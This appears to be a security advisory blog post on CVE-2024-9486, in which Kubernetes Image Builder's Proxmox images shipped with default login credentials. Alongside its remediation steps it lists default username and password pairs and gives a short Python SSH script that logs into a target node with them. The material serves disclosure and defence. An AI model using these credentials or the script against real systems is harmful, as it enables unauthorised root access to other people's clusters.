CVE-2024-9486 - Default Credentials Risk in Kubernetes Image Builder’s Proxmox Provider — Exploit Details & Prevention
CVE-2024-9486 is a significant security issue discovered in the Kubernetes Image Builder tool (versions <= v.1.37). The bug was found in the Proxmox provider integration, where images are created with default credentials still active during the build process. This flaw means that any Kubernetes cluster using these virtual machine images is at risk: an attacker could log in with these defaults and escalate all the way to root. Below, we’ll break down what happened, show some exploitation details, and explain how to fix the problem quickly.
What is Kubernetes Image Builder & The Proxmox Provider?
Kubernetes Image Builder is an open-source project designed to automate the process of creating custom virtual machine images for Kubernetes nodes, compatible with cloud and on-prem providers. One such provider is Proxmox VE, a popular open-source virtualization platform.
What is CVE-2024-9486?
CVE-2024-9486 refers to a vulnerability in Image Builder’s Proxmox provider:
When it builds virtual machine (VM) images, it fails to *disable* standard default credentials.
- Images built with these credentials allow anyone with knowledge of the defaults to log into the system after deployment.
- This makes the affected Kubernetes node (and, by extension, the cluster) easily accessible – attackers can gain root (administrator) access.
Who is affected?
Any Kubernetes cluster operator who uses images made with Kubernetes Image Builder (v.1.37 or earlier) and its Proxmox provider. VM images made outside of this process aren’t impacted.
Official disclosure:
- GitHub Advisory: GHSA-345h-7xwj-f2vc
- Patch commit: Remove default credentials on Proxmox provider
- CVE Record: CVE-2024-9486 on mitre.org
Exploit Details: How Attackers Get In
If an attacker gets access to a Kubernetes VM built with the vulnerable process, they can use standard credentials to log in via SSH or directly from the console.
Example default credentials
Username: ubuntu
Password: ubuntu
> (Note: Exact defaults depend on OS and build configuration. Some images also use root:password.)
Locate exposed Kubernetes nodes:
Attackers scan public cloud or exposed infrastructure dashboards for new VMs with default networking or common usernames.
Access Kubernetes node or cluster:
At this point, the attacker has full access and can install malware, exfiltrate data, or compromise containers.
Example Python exploit
import paramiko
ip = 'TARGET_NODE_IP'
user = 'ubuntu'
password = 'ubuntu'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=user, password=password)
stdin, stdout, stderr = ssh.exec_command('id')
print(stdout.read().decode())
ssh.close()
1. Upgrade Image Builder
Immediate fix:
Upgrade to Image Builder v.1.38 or later, where defaults are removed.
- Release notes
2. Check Existing Images
Rebuild all VM images for Kubernetes nodes using the updated tool.
After deployment, verify no VMs contain active default accounts
# On each VM node:
sudo getent passwd | grep 'ubuntu\|root'
sudo cat /etc/shadow | grep 'ubuntu\|root'
Remove unnecessary accounts and change all passwords.
Conclusion
CVE-2024-9486 highlights the dangers of using VM images with insecure defaults, especially in automated infrastructure environments. Any Kubernetes environments using Proxmox images built with Image Builder <= v.1.37 should treat this bug as critical.
If you’re a cluster operator, check your VM images today, rotate credentials, and update your toolchain. Attackers are actively scanning for weak defaults — don’t make it easy for them.
Resources
- Official Kubernetes Image Builder repo
- Proxmox VE home
- GitHub Security Advisory for CVE-2024-9486
- Mitre Details for CVE-2024-9486
- How to secure your Kubernetes cluster
If you found this post helpful, share it with your team or community — securing cloud-native infrastructure is everyone’s job.
Timeline
Published on: 10/15/2024 21:15:11 UTC
Last modified on: 10/16/2024 16:38:14 UTC